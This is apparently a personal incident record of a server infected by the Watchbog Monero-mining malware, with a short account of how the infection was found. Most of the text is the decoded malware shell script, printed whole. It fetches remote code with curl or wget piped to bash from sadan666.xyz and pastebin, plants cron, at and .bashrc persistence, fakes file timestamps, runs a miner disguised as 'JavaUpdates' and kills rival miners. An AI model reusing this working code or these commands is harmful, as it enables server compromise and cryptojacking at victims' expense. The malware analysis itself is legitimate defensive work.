WatchbogMiner cleanup record
This post is a personal record of a server compromised by the Watchbog mining malware.
Preface:
This malware was discovered in 2019 and takes its name from a parent file called watchdogs that it drops under /tmp/. It spreads through the Redis unauthorized-access vulnerability and SSH brute-forcing. Early versions of WatchdogsMiner hosted the malicious code on pastebin.com to evade detection; later versions abandoned that in favour of their own C&C server *.systemten.org. The samples are compiled from Go and use a disguised hippies/LSD package (github_com_hippies_LSD_*).

1) The attacker's wallet address in this incident:
48S8kPXdSgubJYsMhpRTr4Ct1nznDzV9ohNMEbmKzgeJLwWPV2QfKzsNRDYoxWWMAdTW69EVBhRQuFr7BiCsMQoU9xAKW4U
2) Monero mining pool address:
https://minexmr.com/#worker_stats
3) Monero mined so far:
32.5 XMR; current hash rate 96.40 KH/s, which corresponds to roughly 8,000 compromised servers mining.
4) Altcoin price reference:
Cumulative value mined: today's price is 608 CNY per XMR × 32.5 = 19,760 CNY.

1: How Watchbog was discovered
1.0.0 It started with WinSCP failing to connect with the error "Received too large SFTP packet", as shown in the figure below. Logging in with FinalShell showed CPU usage at only 1%, so at first it looked like nothing more than an FTP connection problem.
1.0.1 Every fix for this error points to the .bashrc file in the .ssh directory; at that point the malware was not yet mining. After deleting the yellow-highlighted line from .bashrc with sed -i and logging in again, the FTP login succeeded.
Being a bit more careful, I opened .bashrc in vim again: CPU was still at only 1%, but the yellow line had been written back. That is highly abnormal behaviour, so I concluded there was malware on the host.

1.0.2 Looking at the yellow line, the download commands in it reveal the addresses https://pastebin.com/raw/1eDKHr4r and https://pastebin.com/raw/UhUmR517.
sed -i '/pastebin.com/d' /etc/hosts;(curl -fsSLk sadan666.xyz:9080/rr -m 90||wget -q -O - sadan666.xyz:9080/rr --no-check-certificate -t 2 -T 60||curl -fsSL https://pastebin.com/raw/1eDKHr4r||wget -q -O- https://pastebin.com/raw/1eDKHr4r)|bash
Inspecting those addresses:

Base64-decoding the code hosted on the third-party site pastebin.com yields the malware's shell script below.
#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
house=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzFlREtIcjRy|base64 -d)
park=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2I1eDFwUnpL|base64 -d)
beam=$(echo c2FkYW42NjYueHl6OjkwODAvcnI=|base64 -d)
deep=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NqaldldlRz|base64 -d)
surf=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3R5am5UUVRB|base64 -d)
me=$( whoami )
function getarch() {
  ver="x86_64"
  arch=$(uname -m)
  arch2=$(uname -i)
  arch3=$(getconf LONG_BIT)
  if [ "$arch" == "x86_64" ]; then
    ver="x86_64"
  elif [ "$arch" == "i686" ]; then
    ver="i686"
  elif [ "$arch2" == "x86_64" ]; then
    ver="x86_64"
  elif [ "$arch2" == "i386" ]; then
    ver="i686"
  elif [ "$arch3" == "64" ]; then
    ver="x86_64"
  else
    ver="x86_64"
  fi
  echo $ver
}

ARCH=$(getarch)

function system() {
  chattr -i /etc/crontab
  rm -rf /bin/httpntp /bin/ftpsdns
  sed -i '/httpntp/d' /etc/crontab
  sed -i '/ftpsdns/d' /etc/crontab
  echo -e "(curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" > /bin/httpntp
  chmod 755 /bin/httpntp
  if [ ! -f "/etc/crontab" ]; then
    echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /bin/httpntp\n##" >> /etc/crontab
  else
    echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
  fi
  echo -e "(curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" > /bin/ftpsdns
  chmod 755 /bin/ftpsdns
  if [ ! -f "/etc/crontab" ]; then
    echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n5 1 * * * root /bin/ftpsdns\n##" >> /etc/crontab
  else
    echo -e "5 1 * * * root /bin/ftpsdns" >> /etc/crontab
  fi
  touch -acmr /bin/sh /etc/crontab
}

function cronhigh() {
  chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
  rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane
  mkdir -p /var/spool/cron/crontabs
  mkdir -p /etc/cron.hourly
  mkdir -p /etc/cron.daily
  mkdir -p /etc/cron.monthly
  sed -i '/pastebin.com/d' /etc/cron.d/root && sed -i '/##/d' /etc/cron.d/root
  sed -i '/pastebin.com/d' /etc/cron.d/apache && sed -i '/##/d' /etc/cron.d/apache
  sed -i '/pastebin.com/d' /etc/cron.d/system && sed -i '/##/d' /etc/cron.d/system
  sed -i '/pastebin.com/d' /var/spool/cron/crontabs/root && sed -i '/##/d' /var/spool/cron/crontabs/root
  sed -i '/pastebin.com/d' /var/spool/cron/root && sed -i '/##/d' /var/spool/cron/root
  key=$( (curl -fsSL $house||wget -q -O - $house) )
  echo -e "*/3 * * * * root (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/root
  echo -e "*/6 * * * * root (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/system
  echo -e "*/7 * * * * root (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/apache
  echo -e "*/9 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/root
  echo -e "*/11 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/crontabs/root
  if [ ! -f "/etc/cron.hourly/oanacroane" ]; then
    echo $key > /etc/cron.hourly/oanacroane && chmod 755 /etc/cron.hourly/oanacroane
  fi
  if [ ! -f "/etc/cron.daily/oanacroane" ]; then
    echo $key > /etc/cron.daily/oanacroane && chmod 755 /etc/cron.daily/oanacroane
  fi
  if [ ! -f "/etc/cron.monthly/oanacroane" ]; then
    echo $key > /etc/cron.monthly/oanacroane && chmod 755 /etc/cron.monthly/oanacroane
  fi
  touch -acmr /bin/sh /var/spool/cron/root
  touch -acmr /bin/sh /var/spool/cron/crontabs/root
  touch -acmr /bin/sh /etc/cron.d/system
  touch -acmr /bin/sh /etc/cron.d/apache
  touch -acmr /bin/sh /etc/cron.d/root
  touch -acmr /bin/sh /etc/cron.hourly/oanacroane
  touch -acmr /bin/sh /etc/cron.daily/oanacroane
  touch -acmr /bin/sh /etc/cron.monthly/oanacroane
}

function cronlow() {
  cr=$(crontab -l | grep "$house" | wc -l)
  if [ ${cr} -eq 0 ];then
    crontab -r
    (crontab -l 2>/dev/null; echo "*/10 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash > /dev/null 2>&1")| crontab -
  else
    echo " "
  fi
}

function cronbackup() {
  pay="(curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60||curl -fsSL $house||wget -q -O- $house)|bash"
  status=0
  crona=$(systemctl is-active cron)
  cronb=$(systemctl is-active crond)
  cronatd=$(systemctl is-active atd)
  if [ "$crona" == "active" ] ; then
    status=0
  elif [ "$cronb" == "active" ]; then
    status=0
  elif [ "$cronatd" == "active" ] ; then
    status=1
  else
    status=2
  fi
  if [ $status -eq 1 ] ; then
    for a in $(at -l|awk '{print $1}'); do at -r $a; done
    echo "$pay" | at -m now + 1 minute
  fi
  if [ $status -eq 2 ] || [ "$me" != "root" ] ;then
    amiup=$(ps -fe|grep 'crun'|grep -v grep|wc -l)
    if [ ${amiup} -ne 0 ] ; then
      ps auxf|grep -v grep|grep "crun" | awk '{print $2}'|xargs kill -9
    fi
    key="while true; do sleep 600 && $pay; done"
    echo -e "$key\n##" > /tmp/crun && chmod 777 /tmp/crun && cd /tmp/
    nohup ./crun >/dev/null 2>&1 &
    sleep 15
    rm /tmp/crun
  fi
}

function cronrc() {
  if [ "$me" != "root" ];then
    cron_rc_path="/home/$me/.bashrc"
    pay_rc="(curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60||curl -fsSL $house||wget -q -O- $house)|bash"
  else
    cron_rc_path="/root/.bashrc"
    pay_rc="sed -i '/pastebin.com/d' /etc/hosts;(curl -fsSLk $beam -m 90||wget -q -O - $beam --no-check-certificate -t 2 -T 60||curl -fsSL $house||wget -q -O- $house)|bash"
  fi
  if [ -f "$cron_rc_path" ]; then
    sed -i '/pastebin.com/d' $cron_rc_path
    sed -i '/loaded_JavaUpdates_rc/d' $cron_rc_path
    echo -e "$pay_rc\n##loaded_JavaUpdates_rc" >> $cron_rc_path
  fi
}

function gettarfile() {
  temp_path="/tmp/.tmpdropoff"
  build_string="/tmp/.tmpdropoff/JavaUpdates"
  if [ "$3" == "-xzf" ];then
    tar_out="/tmp/.tmpdropoff/wwe"
    rig_path="/tmp/.tmpdropoff/dataoutput/xmrig-notls"
  else
    tar_out="/tmp/.tmpdropoff/wwe"
    rig_path="/tmp/.tmpdropoff/dataoutput/xmr-stak"
  fi
  mkdir -p $temp_path/dataoutput/
  cd $temp_path
  (curl -fsSL $2 -o $tar_out||wget -q $2 -O $tar_out)
  base64 -d $tar_out >$build_string
  mv $build_string $3
  cd $1
  rm -rf $temp_path
}

function download() {
  pa=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l)
  if [ ${pa} -eq 0 ];then
    mi_64=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0dNZGVXcWVjCg==|base64 -d)
    der_ke=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L2RYRDJCczBICg==|base64 -d)
    if [ "$me" != "root" ]; then
      path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
      if [ -d "$path" ]; then
        rm -rf $path/*
      else
        mkdir -p $path
      fi
    else
      path="/bin"
      rm -rf $path/config.json $path/JavaUpdates
    fi
    cd $path
    if [ "$ARCH" == "x86_64" ]; then
      if [ ! -f "$path/JavaUpdates" ]; then
        gettarfile "$path" "$mi_64" "$path/JavaUpdates"
        chmod 777 $path/JavaUpdates
        nohup ./JavaUpdates >/dev/null 2>&1 &
        sleep 15
        rm -rf $path/JavaUpdates
      else
        nohup ./JavaUpdates >/dev/null 2>&1 &
        sleep 15
        rm -rf $path/JavaUpdates
      fi
    elif [ "$ARCH" == "i686" ]; then
      # if [ ! -f "$path/JavaUpdates" ]; then
      # getencodedfile "$mi_32" "$path/JavaUpdates"
      # chmod 777 $path/JavaUpdates
      # nohup ./JavaUpdates >/dev/null 2>&1 &
      # else
      # nohup ./JavaUpdates >/dev/null 2>&1 &
      # fi
      echo ""
    else
      if [ ! -f "$path/JavaUpdates" ]; then
        gettarfile "$path" "$mi_64" "$path/JavaUpdates"
        chmod 777 $path/JavaUpdates
        nohup ./JavaUpdates >/dev/null 2>&1 &
        sleep 15
        rm -rf $path/JavaUpdates
      else
        nohup ./JavaUpdates >/dev/null 2>&1 &
        sleep 15
        rm -rf $path/JavaUpdates
      fi
    fi
  fi
}

function testa() {
  pb=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l)
  if [ ${pb} -eq 0 ];then
    st_64=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0VzY3RmZ3J4Cg==|base64 -d)
    con_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1prejBkOUp6Cg==|base64 -d)
    cpu_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L212U0VHbVI2Cg==|base64 -d)
    poo_url=$(echo aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L1NCMFRZQnZHCg==|base64 -d)
    if [ "$me" != "root" ]; then
      path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data"
      if [ -d "$path" ]; then
        rm -rf $path/*
      else
        mkdir -p $path
      fi
    else
      path="/bin"
      rm -rf $path/config.json $path/JavaUpdates $path/config.txt $path/cpu.txt $path/pools.txt
    fi
    cd $path
    if [ "$ARCH" == "x86_64" ]; then
      if [ ! -f "$path/JavaUpdates" ]; then
        gettarfile "$path" "$st_64" "$path/JavaUpdates"
        chmod 777 $path/JavaUpdates
        nohup ./JavaUpdates >/dev/null 2>&1 &
        sleep 15
        rm -rf $path/JavaUpdates
      else
        nohup ./JavaUpdates >/dev/null 2>&1 &
        sleep 15
        rm -rf $path/JavaUpdates
      fi
    else
      rm -rf $path/cpu.txt $path/pools.txt $path/config.txt
    fi
  fi
}

function finished() {
  (curl -fsSL $1 || wget -q -O - $1) && touch /tmp/.tmpc
}


kill_miner_proc()
{
  netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
  netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
  netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :4444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  netstat -anp | grep :14433 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
  ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'kworker -c\' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 %
  ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 %
  ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 %
  ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 %
  netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
  netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 %
  pgrep -f monerohash | xargs -I % kill -9 %
  pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 %
  pgrep -f xzpauectgr | xargs -I % kill -9 %
  pgrep -f slxfbkmxtd | xargs -I % kill -9 %
  pgrep -f mixtape | xargs -I % kill -9 %
  pgrep -f addnj | xargs -I % kill -9 %
  pgrep -f 200.68.17.196 | xargs -I % kill -9 %
  pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 %
